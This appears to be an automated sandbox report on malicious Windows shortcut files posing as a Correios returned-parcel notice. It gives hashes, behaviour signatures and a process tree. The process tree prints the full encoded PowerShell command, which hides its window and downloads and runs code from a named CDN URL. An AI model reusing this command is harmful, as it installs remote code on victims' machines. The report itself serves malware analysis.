Overview
overview
10Static
static
1Mercadoria...0W.lnk
windows7-x64
10Mercadoria...0W.lnk
windows10-2004-x64
10Mercadoria...P8.lnk
windows7-x64
10Mercadoria...P8.lnk
windows10-2004-x64
10Mercadoria...2W.lnk
windows7-x64
10Mercadoria...2W.lnk
windows10-2004-x64
10Mercadoria...XY.lnk
windows7-x64
10Mercadoria...XY.lnk
windows10-2004-x64
10Mercadoria...8J.lnk
windows7-x64
10Mercadoria...8J.lnk
windows10-2004-x64
10Mercadoria...EM.lnk
windows7-x64
10Mercadoria...EM.lnk
windows10-2004-x64
10Mercadoria...25.lnk
windows7-x64
10Mercadoria...25.lnk
windows10-2004-x64
10Mercadoria...01.lnk
windows7-x64
10Mercadoria...01.lnk
windows10-2004-x64
10Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13/09/2024, 19:03
Static task
static1
Behavioral task
behavioral1
Sample
Mercadoria_Devolvida-Correios-0JY43R0W.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Mercadoria_Devolvida-Correios-0JY43R0W.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Mercadoria_Devolvida-Correios-1A4D7UP8.lnk
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Mercadoria_Devolvida-Correios-1A4D7UP8.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Mercadoria_Devolvida-Correios-1EI6TV2W.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Mercadoria_Devolvida-Correios-1EI6TV2W.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
Mercadoria_Devolvida-Correios-1SNBA8XY.lnk
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Mercadoria_Devolvida-Correios-1SNBA8XY.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Resource
win7-20240708-en
Behavioral task
behavioral10
Sample
Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
Mercadoria_Devolvida-Correios-1YMU5EEM.lnk
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
Mercadoria_Devolvida-Correios-1YMU5EEM.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
Mercadoria_Devolvida-Correios-22ES4D25.lnk
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
Mercadoria_Devolvida-Correios-22ES4D25.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
Resource
win10v2004-20240802-en
General
-
Target
Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
-
Size
3KB
-
MD5
246e74b6fffb9d5994f7f70bb6509b45
-
SHA1
4b7bdf4808ce987b9f94ea40bdd081217867483a
-
SHA256
0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
-
SHA512
178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2944 powershell.exe 4 2944 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2944 powershell.exe 2944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2980 wrote to memory of 2944 2980 cmd.exe 31 PID 2980 wrote to memory of 2944 2980 cmd.exe 31 PID 2980 wrote to memory of 2944 2980 cmd.exe 31 PID 2944 wrote to memory of 1908 2944 powershell.exe 32 PID 2944 wrote to memory of 1908 2944 powershell.exe 32 PID 2944 wrote to memory of 1908 2944 powershell.exe 32 PID 1908 wrote to memory of 1744 1908 csc.exe 33 PID 1908 wrote to memory of 1744 1908 csc.exe 33 PID 1908 wrote to memory of 1744 1908 csc.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-2CM0TJ01.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rd4tvptd.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84EA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC84E9.tmp"4⤵PID:1744
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d27b2be0d646920887c532798d41fe80
SHA15d32fbb122293969613e0572b91884fede9a8fea
SHA25660870b764fc9f060ea67201bf732f8f790ddd55370c3287ec7b5696b529e58c7
SHA512264d6beed7fb6c635aee2b2fd10d144f50789cf71fda4d4f58c15bf46e4b27e7845bf94673506d269f3254278db9cdc3ad02f014fae7e5e3590e00a2c9ffc9de
-
Filesize
3KB
MD570a41d2828cd1a589bf12e727f3b8c1a
SHA1b6e3b4a59a8f982e38f763f37c87b22f8ce5c671
SHA256f0771b428e36e3114d5f2c87c911ebaa4d9c22f52954dabb883dda499006fe7d
SHA5125779a660f2993c48487bf8b7dfce9b962a41f389c10abd3e40590bc59223c6c94274be7e91f422b0cf2f24f902fa26924eeec1b0770cca2732deaf6cd8da9050
-
Filesize
7KB
MD5081d7f0dc34387559d9b78b98b8aeeaa
SHA109d6d80986db00246e30b5b42ea034db3bdf17a7
SHA256fbc60db47191b5a15ce98971b831a41954150f5267e31fbe6067ef1c363c0732
SHA512f824bac691c2b9b75179c5ed1c9b688522a9bec399be9c5982314feb1fe61d5059a4feac12a9328e8688a649deaad0c362be9040a28f51b6f204bf2ee0577e61
-
Filesize
652B
MD5109efc988aa578dd7d9b8bb71653914f
SHA14dc3a8eb10e7248f50b9e9f088e8174d43b5f36e
SHA256a71856751772b8f336af1464acec9fce51be825f513312bfbc05a2171a1b09f0
SHA512f18bd857dcc5f1e9e68fb8a23d224a17f28c003c030d5f3b8cc1432c50ad54beaf4c0308f6c9a5d89a479587d7b801dc267dcddd4330d0cdb3c90c99e31e5d63
-
Filesize
187B
MD57b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA2566caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA5127322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize
309B
MD53779b1faed9aa2f055dd6d1b1f88e044
SHA120417b40462c2272d22e49567652712c1cb25792
SHA256e617add30b4580550d18da45ac1383aefbeea02544df0d20a4f103b0af57d0b4
SHA512280423d50e27e6a89846b1c01230272cd11a53e92d487f06c8ecab3c70fcde9089356ba77f80d16e621e93bfe34f80dc9a7cfdbd21864b453d8386a42f3bda3d